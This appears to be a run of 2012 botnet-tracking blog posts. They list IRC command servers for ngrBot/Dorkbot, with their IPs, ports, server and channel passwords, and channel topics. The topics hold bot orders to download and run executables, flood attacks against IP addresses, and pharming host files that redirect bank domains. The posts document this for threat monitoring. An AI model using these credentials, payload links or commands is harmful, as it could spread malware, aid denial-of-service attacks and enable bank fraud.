This botnet has lots of domains, none of which are resolving at the moment. x.n-0-r-1.org x.n0r1.org x.n2rx.asia x.n1rx.asia x.n0r2.asia x.n0r1.asia x.dload.ws x.xd11.in You can still connect to the server using it’s ip address though.. Server: 31.186.102.189 Port: 80 Server password: 666666 Channel: ##CBC-x01## * Topic for ##CBC-x01## is: !m on !mod usbi on !NAZELRead more...
f0010.info (ngr irc botnet hosted by perfectip.net)
Resolved f0010.info to 64.56.64.29, 64.56.64.26 Server: f0010.info Port: 1887 Server Password: leonis Channel: #pool Channel password: leonis * Topic for #pool is: ~pu hxxp://www.sendspace.com/pro/dl/ishh04 1f88bb85c51290b759d16dda9fff692d ~s -o ~s * Topic for #pool set by google at Mon Dec 17 12:16:33 2012 Bots also join the channel for their county, eg #US, and operating system,Read more...
64.56.64.29(ngr botnet hosted in United States Los Angeles Perfect International In)
server: 64.56.64.29:1887 server: 174.37.172.71:1887server: 184.172.60.181:1887server: 5.153.6.203 TCP:1887Server Password:Username: hxfyijcNickname: n{DE|XPa}hxfyijcChannel: #pool (Password: leonis) Cannel:#r3Channeltopic: :~pu hxxp://hotfile.com/dl/184384511/5b0f4b2/omaigato.exe 765cce9dee5448f58d9e798d91dbf809 ~s -o ~s find more infos about the owner and domains searching for 1887 in this blog downloaded samples: hxxp://199.7.177.244/dl/184384734/6e6cd1d/all.exe==>downloads these links:hxxp://80.86.83.93/index (2musicaonline.com)hxxp://80.86.83.93/Emo-Screamo/ (2musicaonline.com) hxxp://hotfile.com/dl/184299133/b91a140/8346g527rg239gth34t24t.html thanks to aLiSs the turkish kebap for submiting samples hosting infos: http://whois.domaintools.com/64.56.64.29
208.98.52.179 (Multiple irc bots hosted by United States Independence Sharktech)
Server: 208.98.52.179 Port: 6969 Channel: #KaRmA## #KaRmA## 24 [+smntu] Nick format: [USA|XP|kikwxww] Channel: #AryaN# #AryaN# 6 [+smntu] Nick format: AryaN{US-XP-x86}1352555 Channel: #pBot# #pBot# 8 [+smntMu] Nick format: KaRmA{VN-XP-x86}0123624 Channel: ##Nix## ##Nix## 4 [+smntMu] Nick format: Linux||296703 Channel: ##ngr ##ngr 6 [+smntu] Nick format: {VN|XPa}sqgblol Weed motd * - With Great Power, Comes Great Responsibility. *Read more...
f0001.info (ngrbot irc botnet hosted by United States Chicago Steadfast Networks)
Resolved f0001.info to 208.117.34.204, 208.117.34.20 Server: f0001.info Port: 1887 Server password: leonis Channel: #pool Channel password: leonis * Topic for #pool is: ~pu hxxp://hotfile.com/dl/180565282/bc43943/queriendo.exe 3ea04ecdc19fad85fdf2eb15ba20cc9a ~s -o ~s * Topic for #pool set by google at Fri Nov 23 10:26:12 2012 Channel: #XP * Topic for #xp is: ~dw hxxp://hotfile.com/dl/180565391/ee7fa0b/ccc.exe 55c6bf0eac7a786de324c7f34ef6db12 ~dw hxxp://hotfile.com/dl/180565492/0dd28c1/10.exe ee2dcac3f9f630c69dd750cc6abc5b8a *Read more...
37.221.171.139 (ngr irc botnet hosted by Germany Frankfurt Am Main Voxility S.r.l.)
Server: 37.221.171.139 Port: 1234 Server password: secret Channel: #nigg Channel password: secret Topic for #nigg is: .slow 80.82.64.21 80 .slow 77.81.243.156 80 .slow 199.59.166.134 80 .slow 77.81.243.156 80 Topic for #nigg set by pb at Wed Nov 21 14:38:45 2012 Oper: pb!abuse@boss Checking out the ips it looks like he is attacking carding/dumps websites swiped.suRead more...
tuntu.info (ngr irc botnet hosted by United States Miami Servergrove)
Resolved tuntu.info to 69.195.198.208 Server: tuntu.info Port: 5487 Channel: #zrl Channel password: filtro * Topic for #zrl is: !mdns http://freebookclubs.com/thumb/demo/host.txt !up hxxp://www.cesarfelipe.com.br//wp-content/themes/sakura/upd.exe EC62971A5CE3FE7DB74BBA3E5D1568D6 * Topic for #zrl set by dexter at Sun Nov 11 17:11:54 2012 host.txt www.bbvabancocontinental.com 38.109.219.132 bbvabancocontinental.com 38.109.219.132 www.bbvacontinental.com 38.109.219.132 bbvacontinental.com 38.109.219.132 www.bbvacontinental.pe 38.109.219.132 bbvacontinental.pe 38.109.219.132 148.244.45.125 38.109.219.132 www.bn.com.pe 38.109.219.132 bn.com.pe 38.109.219.132Read more...
aminakoyim.co.cc (ngr irc botnet hosted by Sweden Stockholm Portlane Networks Ab)
Resolved aminakoyim.co.cc to 46.246.93.77 Server: aminakoyim.co.cc Port: 6667 Password: timu Channel: #NGR * Topic for #NGR is: !vs www.pvpserver.gen.tr 1 | !dl hxxp://www.depac.ws/jar/h.exe * Topic for #NGR set by infeCTeD at Sun Nov 04 13:32:54 2012 All users are auto joined to #debug# on connect * Topic for #debug# is: !dl hxxp://www.depac.ws/jar/t.exe c:/t.exe 1 *Read more...
venus.timeinfo.pl (ngrbot irc botnet hosted by 1&1 Internet Ag)
Note: New domains are at the bottom of the post This is the skype “worm” that is in the news right now Articles: http://www.techspot.com/news/50443-dorkbot-worm-spreading-via-skype-installs-nasty-ransomware.html http://news.cnet.com/8301-1009_3-57528353-83/worm-spreading-on-skype-im-installs-ransomware/ http://techcrunch.com/2012/10/08/ransomware-worm-now-spreading-on-skype/ http://www.forbes.com/sites/adriankingsleyhughes/2012/10/08/ransomware-worm-spreading-via-skype/ http://countermeasures.trendmicro.eu/skype-worm-spreading-fast/ Resolved venus.timeinfo.pl to 63.223.107.62, 176.9.192.131, 213.165.71.142, 217.160.108.147, 213.165.71.153, 87.106.98.157, 74.208.112.178 Server: venus.timeinfo.pl Port: 1863 Password: 24r34t SSL is needed to connect, accept the invalid certificate Authhost: bossmanRead more...
tut0r1allsvu.info (ngr botnet hosted by United States Elk Grove Village Foroquimica Sl)
Resolved tut0r1allsvu.info to 75.127.10.3 Server: tut0r1allsvu.info Port: 8059 Password:ocx Channel: ##h4n Channel password: shell3 * Topic for ##h4n is: -up hxxp://www.premiersportsgroup.co/utily.exe 96E0E5E5861397EF644FA006BB888956 | -s * Topic for ##h4n set by Ko0l at Tue Oct 02 05:13:49 2012 Redirecting Colombian bots for pharming * Topic for #CO is: -mdns http://www.ellegadodelleon.com.ar/wp-content/it.txt * Topic for #CO set byRead more...